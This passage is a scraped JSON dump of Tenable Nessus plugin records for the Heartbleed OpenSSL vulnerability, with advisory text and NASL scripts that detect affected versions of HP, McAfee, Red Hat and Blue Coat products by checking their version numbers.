script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP LoadRunner installed on the remote host is 11.52.x\nprior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. 
It is,\ntherefore, affected by an out-of-bounds read error, known as the\n'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04286049\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3b43466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/532104/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to HP LoadRunner 11.52 Patch 2 / 12.00 Patch 1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:loadrunner\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_loadrunner_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/HP LoadRunner\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude(\"install_func.inc\");\n\napp_name = \"HP LoadRunner\";\ncutoff = NULL;\ncutoff2 = NULL;\nfixed = NULL;\nreport = NULL;\n\n# Only 1 install of the server is possible.\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\nverui = install['display_version'];\n\n# Determine cutoff if affected branch.\n# 11.52.0 is 11.52.1323.0 or 11.52.1517.0\n# 12.00.0 is 12.00.661.0\nif (version =~ \"^11\\.52($|[^0-9])\")\n{\n cutoff = \"11.52.1323.0\";\n cutoff2 = \"11.52.1517.0\";\n}\nif (version =~ \"^12\\.00?($|[^0-9])\")\n{\n cutoff = \"12.0.661.0\";\n cutoff2 = \"12.0.661.0\";\n}\n\nif (isnull(cutoff)) audit(AUDIT_NOT_INST, app_name + \" 11.52.x / 12.0.x\");\n\nif (version >= cutoff && version <= cutoff2)\n{\n foreach file (make_list(\"ssleay32_101_x32.dll\", \"ssleay32_101_x64.dll\"))\n {\n dll_path = path + \"bin\\\" + file;\n res = hotfix_get_fversion(path:dll_path);\n err_res = hotfix_handle_error(\n error_code : res['error'],\n file : dll_path,\n appname : app_name,\n exit_on_fail : FALSE\n );\n if (err_res) continue;\n\n dll_ver = join(sep:'.', res['value']);\n break;\n }\n hotfix_check_fversion_end();\n\n if (empty_or_null(dll_ver))\n audit(\n AUDIT_VER_FAIL,\n \"ssleay32_101_x32.dll and 
ssleay32_101_x64.dll under \" + path + \"bin\\\"\n );\n\n fixed_dll_ver = '1.0.1.4';\n if (ver_compare(ver:dll_ver, fix:fixed_dll_ver, strict:FALSE) == -1)\n report =\n '\\n Path : ' + dll_path +\n '\\n Installed DLL version : ' + dll_ver +\n '\\n Fixed DLL version : ' + fixed_dll_ver +\n '\\n';\n}\n# If not at a patchable version, use ver_compare() and suggest\n# upgrade if needed; do not use cutoff2 - this will lead to\n# false positives.\nelse if (\n (\n cutoff =~ \"^11\\.\" &&\n ver_compare(ver:\"11.52\", fix:version, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1\n )\n ||\n (\n cutoff =~ \"^12\\.\" &&\n ver_compare(ver:\"12.00\", fix:version, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1\n )\n)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 11.52.1323.0 (11.52 Patch 2) / 12.0.661.0 (12.00 Patch 1)' +\n '\\n';\n}\n\nif (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);\n\nport = kb_smb_transport();\n\nif (report_verbosity > 0) security_warning(extra:report, port:port);\nelse security_warning(port);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T03:45:59", "description": "The remote host is running a version of McAfee Next Generation\nFirewall (NGFW) that is affected by an information disclosure\nvulnerability due to a flaw in the OpenSSL library, commonly known as\nthe Heartbleed bug. 
An attacker could potentially exploit this\nvulnerability repeatedly to read up to 64KB of memory from the device.", "edition": 25, "published": "2014-05-02T00:00:00", "title": "McAfee Next Generation Firewall OpenSSL Information Disclosure (SB10071) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mcafee:ngfw"], "id": "MCAFEE_NGFW_SB10071.NASL", "href": "https://www.tenable.com/plugins/nessus/73835", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73835);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10071\");\n\n script_name(english:\"McAfee Next Generation Firewall OpenSSL Information Disclosure (SB10071) (Heartbleed)\");\n script_summary(english:\"Checks NGFW version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of McAfee Next Generation\nFirewall (NGFW) that is affected by an information disclosure\nvulnerability due to a flaw in the OpenSSL library, commonly known as\nthe Heartbleed bug. 
An attacker could potentially exploit this\nvulnerability repeatedly to read up to 64KB of memory from the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10071\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:ngfw\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_ngfw_version.nbin\");\n script_require_keys(\"Host/McAfeeNGFW/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"McAfee Next Generation Firewall\";\nversion = get_kb_item_or_exit(\"Host/McAfeeNGFW/version\");\n\n# Determine fix.\nif (version =~ \"^5\\.5\\.\") fix = \"5.5.7.9887\";\nelse if (version =~ \"^5\\.7\\.\") fix = \"5.7.1\";\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(extra:report, port:port);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:14:14", "description": "An updated rhev-hypervisor6 package that fixes one security issue is\nnow available for Red Hat Enterprise Virtualization Hypervisor 3.2.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. It includes everything necessary to run and manage\nvirtual machines: a subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nImportant: This update is an emergency security fix being provided\noutside the scope of the published support policy for Red Hat\nEnterprise Virtualization listed in the References section. 
In\naccordance with the support policy for Red Hat Enterprise\nVirtualization, Red Hat Enterprise Virtualization Hypervisor 3.2 will\nnot receive future security updates.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised\nto upgrade to this updated package, which corrects this issue.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-08T00:00:00", "title": "RHEL 6 : rhev-hypervisor6 (RHSA-2014:0396) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-11-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-0396.NASL", "href": "https://www.tenable.com/plugins/nessus/79008", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0396. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79008);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"RHSA\", value:\"2014:0396\");\n\n script_name(english:\"RHEL 6 : rhev-hypervisor6 (RHSA-2014:0396) (Heartbleed)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated rhev-hypervisor6 package that fixes one security issue is\nnow available for Red Hat Enterprise Virtualization Hypervisor 3.2.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. It includes everything necessary to run and manage\nvirtual machines: a subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nImportant: This update is an emergency security fix being provided\noutside the scope of the published support policy for Red Hat\nEnterprise Virtualization listed in the References section. 
In\naccordance with the support policy for Red Hat Enterprise\nVirtualization, Red Hat Enterprise Virtualization Hypervisor 3.2 will\nnot receive future security updates.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised\nto upgrade to this updated package, which corrects this issue.\"\n );\n # https://access.redhat.com/site/support/policy/updates/rhev/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/support/policy/updates/rhev/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0160\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rhev-hypervisor6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0396\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"rhev-hypervisor6-6.5-20140118.1.3.2.el6_5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhev-hypervisor6\");\n }\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-01T03:15:34", "description": "According to its version, the HP Insight Control Server Migration\ninstall on the remote Windows host includes a bundled copy of OpenSSL\nthat is affected by an information disclosure vulnerability. 
A remote\nattacker could read the contents of up to 64KB of server memory,\npotentially exposing passwords, private keys, and other sensitive\ndata.", "edition": 26, "published": "2014-07-10T00:00:00", "title": "HP Insight Control Server Migration 7.3.0 and 7.3.1 OpenSSL Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:insight_control_server_migration", "cpe:/a:hp:server_migration_pack_universal_edition"], "id": "HP_INSIGHT_CONTROL_SERVER_MIGRATION_7_3_2.NASL", "href": "https://www.tenable.com/plugins/nessus/76463", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76463);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04268240\");\n script_xref(name:\"HP\", value:\"HPSBMU03029\");\n script_xref(name:\"HP\", value:\"SSRT101543\");\n\n script_name(english:\"HP Insight Control Server Migration 7.3.0 and 7.3.1 OpenSSL Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks HP Insight Control Server Migration version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has migration software installed that is\naffected by an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the HP Insight Control Server Migration\ninstall on the remote Windows host includes a bundled copy of OpenSSL\nthat is affected by an information disclosure vulnerability. 
A remote\nattacker could read the contents of up to 64KB of server memory,\npotentially exposing passwords, private keys, and other sensitive\ndata.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04268240\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8929b483\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to HP Insight Control Server Migration 7.3.2, which is included\nwith the HP Insight Management 7.0.3a incremental update.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:server_migration_pack_universal_edition\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:insight_control_server_migration\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_insight_control_server_migration_installed.nbin\");\n script_require_keys(\"installed_sw/HP Insight Control Server Migration\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"HP Insight Control Server Migration\";\nget_install_count(app_name:app_name, exit_if_zero:TRUE);\n\n# Only 1 install of the server is possible.\ninstall = get_installs(app_name:app_name);\nif (install[0] == IF_NOT_FOUND) audit(AUDIT_NOT_INST, app_name);\ninstall = install[1][0];\n\nversion = install['version'];\npath = install['path'];\n\n# Determine fix if affected branch.\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_APP_VER, app_name);\n\nif (version =~ \"^7\\.3(\\.0|$)\" || version == \"7.3.1\")\n{\n fix = \"7.3.2\";\n\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(extra:report, port:port);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:21:59", "description": "The remote Blue Coat ProxySG device's SGOS self-reported version is\n6.5.3.x prior to 6.5.3.6. 
It is, therefore, potentially affected by an\ninformation disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "edition": 26, "published": "2014-04-15T00:00:00", "title": "Blue Coat ProxySG Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:bluecoat:sgos"], "id": "BLUECOAT_PROXY_SG_6_5_3_6.NASL", "href": "https://www.tenable.com/plugins/nessus/73515", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73515);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Blue Coat ProxySG Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the Blue Coat ProxySG SGOS version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is potentially affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Blue Coat ProxySG device's SGOS self-reported version is\n6.5.3.x prior to 6.5.3.6. 
It is, therefore, potentially affected by an\ninformation disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bto.bluecoat.com/security-advisory/sa79\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 6.5.3.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:bluecoat:sgos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bluecoat_proxy_sg_version.nasl\");\n script_require_keys(\"Host/BlueCoat/ProxySG/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/BlueCoat/ProxySG/Version\");\nui_version = get_kb_item(\"Host/BlueCoat/ProxySG/UI_Version\");\n\nif (version =~ \"^6\\.5\\.3($|[^0-9])\")\n{\n fix = '6.5.3.6';\n ui_fix = '6.5.3.6 Build 0';\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Blue Coat ProxySG\", version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n # Select format for output\n if (isnull(ui_version))\n {\n report_ver = version;\n report_fix = fix;\n }\n else\n {\n report_ver = ui_version;\n report_fix = ui_fix;\n }\n\n report =\n '\\n Installed version : ' + report_ver +\n '\\n Fixed version : ' + report_fix +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Blue Coat ProxySG\", version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": 